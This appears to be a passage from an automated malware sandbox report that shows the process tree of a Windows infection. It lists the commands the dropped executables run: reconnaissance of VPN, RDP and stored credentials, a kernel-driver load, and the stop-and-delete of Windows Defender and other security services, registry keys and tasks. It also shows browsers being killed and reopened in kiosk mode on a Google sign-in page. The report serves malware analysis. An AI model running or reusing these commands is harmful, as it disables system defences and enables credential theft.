                                                                                                PID:1716
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
                                                                                                7⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:6048
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
                                                                                                7⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Hide Artifacts: Ignore Process Interrupts
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:1980
                                                                                              • C:\Windows\system32\cmdkey.exe
                                                                                                "cmdkey" /list
                                                                                                7⤵
                                                                                                  PID:3292
                                                                                                • C:\Windows\system32\cmdkey.exe
                                                                                                  "cmdkey" /list:TERMSRV/69.48.201.74
                                                                                                  7⤵
                                                                                                    PID:6008
                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                    "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
                                                                                                    7⤵
                                                                                                      PID:5112
                                                                                                    • C:\Windows\system32\hostname.exe
                                                                                                      "hostname"
                                                                                                      7⤵
                                                                                                        PID:1064
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "powershell" -Command "Get-WmiObject Win32_VideoController | ForEach-Object { $_.Name }"
                                                                                                        7⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:2940
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "powershell" -Command "Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'virtual|loopback' } | Sort-Object -Property LinkSpeed -Descending | Select-Object -First 1 -ExpandProperty MacAddress"
                                                                                                        7⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:1132
                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                        "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
                                                                                                        7⤵
                                                                                                          PID:1584
                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                          "netsh" advfirewall show allprofiles state
                                                                                                          7⤵
                                                                                                          • Modifies Windows Firewall
                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                          PID:4772
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe"
                                                                                                        6⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:4764
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                          7⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:916
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FEB3.tmp\FEB4.tmp\FEB5.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                            8⤵
                                                                                                              PID:5880
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                                                                                                                9⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:1772
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FF30.tmp\FF31.tmp\FF32.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                                                                                                                  10⤵
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  PID:1848
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:1836
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc start ddrver
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:4376
                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                    timeout /t 1
                                                                                                                    11⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:3676
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc stop ddrver
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:4944
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc start ddrver
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:5736
                                                                                                                  • C:\Windows\system32\takeown.exe
                                                                                                                    takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                                                                                                    11⤵
                                                                                                                    • Possible privilege escalation attempt
                                                                                                                    • Modifies file permissions
                                                                                                                    PID:3312
                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                    icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                                                                                                    11⤵
                                                                                                                    • Possible privilege escalation attempt
                                                                                                                    • Modifies file permissions
                                                                                                                    PID:1584
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc stop "WinDefend"
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:1520
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc delete "WinDefend"
                                                                                                                    11⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:3004
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                                                                                                    11⤵
                                                                                                                      PID:4560
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      sc stop "MDCoreSvc"
                                                                                                                      11⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:3664
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      sc delete "MDCoreSvc"
                                                                                                                      11⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:1492
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                                                                                                      11⤵
                                                                                                                        PID:396
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc stop "WdNisSvc"
                                                                                                                        11⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:5212
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc delete "WdNisSvc"
                                                                                                                        11⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:6032
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                                                                                                        11⤵
                                                                                                                          PID:5756
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          sc stop "Sense"
                                                                                                                          11⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:4036
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          sc delete "Sense"
                                                                                                                          11⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:5624
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                                                                                                          11⤵
                                                                                                                            PID:4864
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            sc stop "wscsvc"
                                                                                                                            11⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:3924
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            sc delete "wscsvc"
                                                                                                                            11⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:4676
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                                                                                                            11⤵
                                                                                                                            • Modifies security service
                                                                                                                            PID:5596
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            sc stop "SgrmBroker"
                                                                                                                            11⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:2028
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            sc delete "SgrmBroker"
                                                                                                                            11⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:2396
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                                                                                                            11⤵
                                                                                                                              PID:4768
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              sc stop "SecurityHealthService"
                                                                                                                              11⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:1928
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              sc delete "SecurityHealthService"
                                                                                                                              11⤵
                                                                                                                              • Launches sc.exe
                                                                                                                              PID:4580
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                                                                                                              11⤵
                                                                                                                                PID:5664
                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                sc stop "webthreatdefsvc"
                                                                                                                                11⤵
                                                                                                                                • Launches sc.exe
                                                                                                                                PID:4708
                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                sc delete "webthreatdefsvc"
                                                                                                                                11⤵
                                                                                                                                • Launches sc.exe
                                                                                                                                PID:4488
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                                                                                                                11⤵
                                                                                                                                  PID:5880
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc stop "webthreatdefusersvc"
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:4728
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc delete "webthreatdefusersvc"
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:2820
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                                                                                                                  11⤵
                                                                                                                                    PID:5024
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc stop "WdNisDrv"
                                                                                                                                    11⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:4912
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc delete "WdNisDrv"
                                                                                                                                    11⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:964
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                                                                                                    11⤵
                                                                                                                                      PID:5396
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      sc stop "WdBoot"
                                                                                                                                      11⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:1524
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      sc delete "WdBoot"
                                                                                                                                      11⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:4628
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                                                                                                      11⤵
                                                                                                                                        PID:1656
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        sc stop "WdFilter"
                                                                                                                                        11⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:1808
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        sc delete "WdFilter"
                                                                                                                                        11⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:2896
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                                                                                                        11⤵
                                                                                                                                          PID:4680
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          sc stop "SgrmAgent"
                                                                                                                                          11⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:3856
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          sc delete "SgrmAgent"
                                                                                                                                          11⤵
                                                                                                                                          • Launches sc.exe
                                                                                                                                          PID:740
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                                                                                                          11⤵
                                                                                                                                            PID:1396
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            sc stop "MsSecWfp"
                                                                                                                                            11⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:3228
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            sc delete "MsSecWfp"
                                                                                                                                            11⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:5864
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                                                                                                            11⤵
                                                                                                                                              PID:3604
                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                              sc stop "MsSecFlt"
                                                                                                                                              11⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:3064
                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                              sc delete "MsSecFlt"
                                                                                                                                              11⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:5164
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                                                                                                              11⤵
                                                                                                                                                PID:1132
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                sc stop "MsSecCore"
                                                                                                                                                11⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:5752
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                sc delete "MsSecCore"
                                                                                                                                                11⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:1368
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                                                                                                                11⤵
                                                                                                                                                  PID:3688
                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                                                                                                  11⤵
                                                                                                                                                    PID:1404
                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                                                                                                    11⤵
                                                                                                                                                      PID:4472
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                                                                                                      11⤵
                                                                                                                                                        PID:1908
                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                                                                                                        11⤵
                                                                                                                                                          PID:2456
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          sc stop ddrver
                                                                                                                                                          11⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:4456
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          sc delete ddrver
                                                                                                                                                          11⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:3908
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10413350101\93a8c2a642.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10413350101\93a8c2a642.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5316
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10413350101\93a8c2a642.exe"
                                                                                                                                                  7⤵
                                                                                                                                                  • Downloads MZ/PE file
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3292
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10413360101\08ea25dad9.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10413360101\08ea25dad9.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:3004
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10413360101\08ea25dad9.exe"
                                                                                                                                                  7⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:5292
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10413370101\2bab32b808.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10413370101\2bab32b808.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:4552
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10413380101\2dde2eb10e.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10413380101\2dde2eb10e.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Downloads MZ/PE file
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Checks computer location settings
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                PID:4920
                                                                                                                                                • C:\Users\Admin\AppData\Local\LUHfz8UVhz2z.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\LUHfz8UVhz2z.exe"
                                                                                                                                                  7⤵
                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2440
                                                                                                                                                • C:\Users\Admin\AppData\Local\COJtjMLvcJHa.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\COJtjMLvcJHa.exe"
                                                                                                                                                  7⤵
                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:6020
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10413390101\cf814bf0a7.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10413390101\cf814bf0a7.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                PID:3664
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /F /IM firefox.exe /T
                                                                                                                                                  7⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:5124
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /F /IM chrome.exe /T
                                                                                                                                                  7⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:6092
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /F /IM msedge.exe /T
                                                                                                                                                  7⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:536
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /F /IM opera.exe /T
                                                                                                                                                  7⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:948
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /F /IM brave.exe /T
                                                                                                                                                  7⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:5496
                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                  7⤵
                                                                                                                                                    PID:2272
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                      8⤵
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:4592
                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {0e886c64-0f9b-4624-b6d0-dac0f3eab1c2} -parentPid 4592 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4592" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                                                        9⤵
                                                                                                                                                          PID:5172
                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27135 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {3fc78fc8-4e1b-4bba-890e-a68d0fc8b8cf} -parentPid 4592 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4592" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                                                          9⤵
                                                                                                                                                            PID:5788
                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3820 -prefsLen 25164 -prefMapHandle 3824 -prefMapSize 270279 -jsInitHandle 3828 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3836 -initialChannelId {2a6ab011-40e8-4a64-9beb-de4d208dff79} -parentPid 4592 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4592" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                                            9⤵
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            PID:3096
                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3984 -prefsLen 27276 -prefMapHandle 3988 -prefMapSize 270279 -ipcHandle 4072 -initialChannelId {f4d71aae-83dd-485a-8d8a-b0204c9275fc} -parentPid 4592 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4592" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                                            9⤵
                                                                                                                                                              PID:5036
                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 1676 -prefsLen 34775 -prefMapHandle 2792 -prefMapSize 270279 -jsInitHandle 3096 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3136 -initialChannelId {808df088-e897-4568-8d59-fba0f1ffc42e} -parentPid 4592 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4592" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                                              9⤵
                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                              PID:1880
                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5084 -prefsLen 35012 -prefMapHandle 5112 -prefMapSize 270279 -ipcHandle 5116 -initialChannelId {98e0486e-b134-43fc-9d61-aacb9cb11b65} -parentPid 4592 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4592" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                                              9⤵
                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                              PID:5576
                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5472 -prefsLen 32952 -prefMapHandle 5468 -prefMapSize 270279 -jsInitHandle 5464 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5636 -initialChannelId {8cd756b3-75a6-4ff3-83ce-678602542afc} -parentPid 4592 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4592" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                                              9⤵
                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                              PID:4904
                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5648 -prefsLen 32952 -prefMapHandle 5716 -prefMapSize 270279 -jsInitHandle 5720 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5644 -initialChannelId {50f1ef3d-2ac0-460c-b89a-00f3197a7c0c} -parentPid 4592 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4592" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                                              9⤵
                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                              PID:4792
                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5972 -prefsLen 32952 -prefMapHandle 5976 -prefMapSize 270279 -jsInitHandle 5980 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5984 -initialChannelId {59a54b90-e8f1-4171-bfaf-cd4bb508cdaa} -parentPid 4592 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4592" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                                              9⤵
                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                              PID:5884
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10413400101\b474d33350.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10413400101\b474d33350.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                        • Modifies Windows Defender TamperProtection settings
                                                                                                                                                        • Modifies Windows Defender notification settings
                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                        • Windows security modification
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:4672
